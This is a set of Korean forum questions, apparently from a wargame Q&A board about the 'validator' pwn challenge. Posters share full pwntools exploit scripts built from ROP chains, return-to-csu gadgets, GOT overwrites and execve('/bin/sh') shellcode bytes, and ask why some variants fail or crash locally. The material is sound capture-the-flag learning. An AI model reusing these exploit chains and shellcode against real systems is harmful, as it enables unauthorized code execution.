안녕하세요. 해당 문제를 풀기 위해서 RAO, ROP, GOT Overwrite 공격을 통해 문제를 풀이하던 중 궁금증이 생겨서 질문을 남깁니다. payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_pop_r15) + p64(exit_got) + p64(0) payload += p64(pop_rdx) + p64(len(shellcode)) payload += p64(read_plt) payload += p64(exit_got) payload += p64(exit_plt) main의 read sleep(0.5) p.send(payload) ROP의 read sleep(0.5) p.send(shellcode) p.interactive() shellcraft.execve("/bin/sh", 0, 0)을 통해 쉘코드를 생성한 후, 위와 같이 exit_got에 GOT Overwrite를 해주었습니다. 이후, exit_got로 Return address를 조작하여 문제를 풀이할 수 있었는데, 여기서 주석친 코드처럼 exit_got가 아닌 exit_plt로 Return address를 조작하면 쉘코드가 실행되지 않는 이유가 무엇인가요? exit_plt를 호출해도 결국 exit_got에 적힌 쉘코드를 수행할 것이라고 생각했는데, 안되는 이유가 아래의 두 이유 중 있을까요? exit_plt를 호출하면 인자를 설정하는 과정에서 문제가 생겨서 쉘코드가 정상적으로 실행되지 않는다. exit_plt를 통해 exit_got에 접근했을 때, exit_got에는 쉘코드의 주소가 저장되어있어야 하는데, 쉘코드의 instruction 자체가 저장되있기 때문에 쉘코드가 정상적으로 실행할 수 없다. 두 이유 모두 아니라면 exit_plt로는 쉘코드를 실행할 수 없는 이유를 설명해주신다면 정말 감사드리겠습니다.

원래 bss가 rwx영역이었나요??

from pwn import * context.arch = 'amd64' p = remote('host1.dreamhack.games', 17182) e = ELF('./validator_server') payroad = b'DREAMHACK!' for i in range(118 + 8, 0, -1): payroad += (i).to_bytes(1, byteorder='little') shell_code = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" read_plt = e.plt['read'] read_got = e.got['read'] pop_rdi = 0x00000000004006f3 pop_rsi_r15 = 0x00000000004006f1 pop_rdx = 0x000000000040057b payroad += p64(pop_rdi) + p64(0) payroad += p64(pop_rsi_r15) + p64(read_got) + p64(0) payroad += p64(pop_rdx) + p64(len(shell_code)) payroad += p64(read_plt) payroad += p64(read_got) # read_plt를 넣어도 똑같은 거 아닌가요?? p.send(payroad) p.send(shell_code) p.interactive() 위의 코드로 익스플로잇을 실행했을 때 마지막 payroad에 read_plt를 넣었을 때는 쉘을 획득하지 못하고 read_got를 넣었을 때만 쉘코드가 실행되는 이유가 궁금합니다. read_plt를 넣어줘도 read_got의 주소를 가리키게 돼서 결국 read_got의 쉘코드가 실행되어야 하지 않나요?

bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803)

아래는 제 exploit 코드입니다. 이 코드에서 쉘 코드를 memset got에 overwrite한 후 memset의 got으로 ret를 변조할 때 앞에 p64(0)을 7번 붙여주지 않는다면 exploit이 수행되지 않는데, 이유를 모르겠습니다.. 왜 memset got으로만 ret를 변조했을 때는 쉘을 얻지 못하지만 앞에 p64(0)을 7번 붙여준다면 쉘을 얻을 수 있는건가요? from pwn import * context.log_level = 'debug' csu_pop = 0x00000000004006EA #pop rbx pop rbp pop r12 pop r13 pop r14 pop r15 ret csu_mov = 0x00000000004006D0 #r15 -> rdx r14 -> rsi r13 -> rdi call r12+rbx*8 shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" #31byte payload = b"DREAMHACK!" arr = [] for i in range(118,0,-1): arr.append(i) payload += bytearray(arr) payload += p64(0) print(len(payload)) p = remote('host1.dreamhack.games', 8893) #p = process('./validator_dist') e = ELF('./validator_dist') bss = e.bss() def make_csu_chain(address, arg1, arg2, arg3): temp = p64(csu_pop) + p64(0) + p64(1) + address + arg1 + arg2 + arg3 + p64(csu_mov) return temp payload += make_csu_chain(p64(e.got['read']), p64(0), p64(e.got['memset']), p64(len(shellcode)+1)) payload += p64(e.got['memset']) #위 코드 대신 이 코드를 사용하면 exploit이 됨 payload += p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(e.got['memset']) p.sendline(payload) sleep(0.5) p.sendline(shellcode) p.interactive() 화면 캡처 2021-06-01 122755.png 위는 csu 코드 및 주소 입니다.

payload = b'DREAMHACK!' for i in range(118, 0, -1): payload += i.to_bytes(1, byteorder='little') payload += p64(0) 페이로드의 일부인데 맨 아래 코드(8바이트의 \x00을 넣어주는 코드)는 잘 되는데 똑같이 8 바이트의 A 를 넣어주는 payload += b'A' * 8 로 바꾸면 익스가 되지 않는데 그 이유를 모르겠습니다. 그리고 main 함수 내에서 leave 명령을 수행했을 때 저기에 있는 8바이트가 rbp에 들어가는 것이 맞나요?

from pwn import * p = process("./validator_dist") p = remote("host3.dreamhack.games", 10527) gadgets & data read_plt = 0x400470 prdi_r = 0x00000000004006f3 prsir15_r = 0x00000000004006f1 prdx_r = 0x40057b writable_address = 0x601050 shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" payload = b"DREAMHACK!" + b"A" # s[0] ~ s[9], s[10] for i in range(118): payload += bytes([255-i]) # s[11] ~ s[128] payload += b'B'*0x7 # SFP read(0, writable_address, 0x20) payload += p64(prdi_r) + p64(0) + p64(prsir15_r) + p64(writable_address) + p64(0) + p64(prdx_r) + p64(0x20) + p64(read_plt) payload += p64(writable_address) p.send(payload) p.send(shellcode) p.interactive() 일단 제 코드 첨부합니다! 궁금한 점은, 로컬에서 테스트할 때 p=process("./validator-dist")로 하고 실행시키면 ROP chain에 의해 read 함수 호출까지 가기도 전에 계속 실패합니다. (p.send(shellcode) 실행 안 됩니다 EOFError로) 아무리 확인해봐도 코드에 문제가 없는 것 같길래 호오옥시몰라 p=process("./validator-server")로 바꾸고 했더니 잘 exploit됩니다. 쉘코드까지 잘 실행됩니다(해당 영역 rw-인데 어케 되는지는 의문이지만) 두 바이너리의 차이는 stripped 여부밖에 없는 것 같은데, 왜 차이가 발생하는걸까요..?

local에서 진행했습니다. memset.got 주소에 shellcode를 overwrite하는 데에는 성공했습니다. 그런데 memset.got에 진입한 이후는 gdb에서 ni를 하려고 하면 계속 SIGSEGV가 뜨면서 진행이 되지 않습니다 혹시 원인이 무엇인지 아신다면 알려주세요ㅠㅠ 1.jpg 2.jpg 3.jpg

앞서 질문을 드렸는데, 답변이 없어 새로 올립니다. bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803) Lv.10 anous 7일 전 (수정됨) 스택 검사하는 부분은 건너띄고, 아래 payload를 보냈습니다. shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" bss = 0x000000000060104b payload += p64(pop_rdi) payload += p64(0) # rdi payload += p64(pop_rsi_r15) payload += p64(bss) + p64(0) # rsi, r15 payload += p64(pop_rdx) payload += p64(len(shellcode)) payload += p64(read_plt) payload += p64(bss) p.send(payload) pause() p.send(shellcode) p.interactive() `

캡처.PNG 제 GDB에는 실행 권한이 없는데, 원래 이런건가요?